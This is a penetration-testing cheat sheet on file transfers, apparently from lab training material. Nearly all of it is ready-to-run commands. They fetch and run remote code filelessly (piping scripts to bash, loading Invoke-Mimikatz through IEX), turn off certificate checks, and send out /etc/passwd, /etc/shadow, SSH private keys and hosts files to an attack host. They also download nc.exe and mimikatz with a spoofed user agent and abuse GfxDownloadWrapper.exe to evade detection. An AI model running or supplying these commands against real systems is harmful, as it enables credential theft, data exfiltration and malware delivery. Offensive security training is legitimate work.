File Transfers

Download Operations

Terminal String Copy & Paste

Linux Encode Base64

cat id_rsa |base64 -w 0;echo

Windows Decode & Write Base64

[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("BASE 64 STRING"))

cmd.exe has a maximum string length of 8,191 & powershell.exe has a maximum string length 2,147,483,647 characters

Web Downloads with Wget & cURL

Download a File Using wget

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Fileless Download with wget

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Download a File Using cURL

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless Download with cURL

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Download with Bash (/dev/tcp)

Connect to the Target Webserver

exec 3<>/dev/tcp/10.10.10.32/80

HTTP GET Request

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

Print the Response

cat <&3

PowerShell Web Downloads

DownloadFile Method

(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

DownloadString - Fileless Method

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

Invoke-WebRequest

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name

Common Errors with PowerShell

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. This can be bypassed using the parameter -UseBasicParsing

Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

Copy a File from the SMB Server

copy \\192.168.220.133\share\nc.exe

New versions of Windows block unauthenticated guest access

Create the SMB Server with Username & Password

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Mount the SMB Server with Username and Password

net use n: \\192.168.220.133\share /user:test test

You can also mount the SMB server if you receive an error when you use copy filename \\IP\sharename.

FTP Downloads

Installing the FTP Server Python3 Module - pyftpdlib

sudo pip3 install pyftpdlib

Setting up a Python3 FTP Server

sudo python3 -m pyftpdlib --port 21

Transfering Files from an FTP Server Using PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

Command File for FTP Client To Download File

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

You may not have an interactive shell. If that's the case, we can create an FTP command file to download a file

Upload Operations

Terminal String Copy & Paste

Windows Encode & Write Base64

[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

Linux Decode Base64

echo Base64string | base64 -d > hosts

Web Uploads with cURL

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

PowerShell Web Uploads

Installing a Configured WebServer with Upload

pip3 install uploadserver

python3 -m uploadserver

PowerShell Script to Upload a File to Python Upload Server

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

PowerShell Base64 Web Upload

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))

Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

nc -lvnp 8000

echo <base64> | base64 -d -w 0 > hosts

SMB Uploads

Commonly enterprises don't allow the SMB protocol (TCP/445). An alternative is to run SMB over HTTP with WebDav. When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP

Installing WebDav Python modules

sudo pip3 install wsgidav cheroot

Using the WebDav Python module

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Connecting to the Webdav Share

dir \\192.168.49.128\DavWWWRoot

DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: \192.168.49.128\sharefolder

Uploading Files using SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

FTP Uploads

sudo python3 -m pyftpdlib --port 21 --write

You need to specify the option --write to allow clients to upload files to our attack host

PowerShell Upload File

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Command File for FTP Client to Upload File

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Mounting a Linux Folder With RDP

Mounting Using rdesktop

rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

Mounting Using xfreerdp

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Evading Detection

Listing out User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Request with Chrome User Agent

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome

Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

Transferring File with GfxDownloadWrapper.exe

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"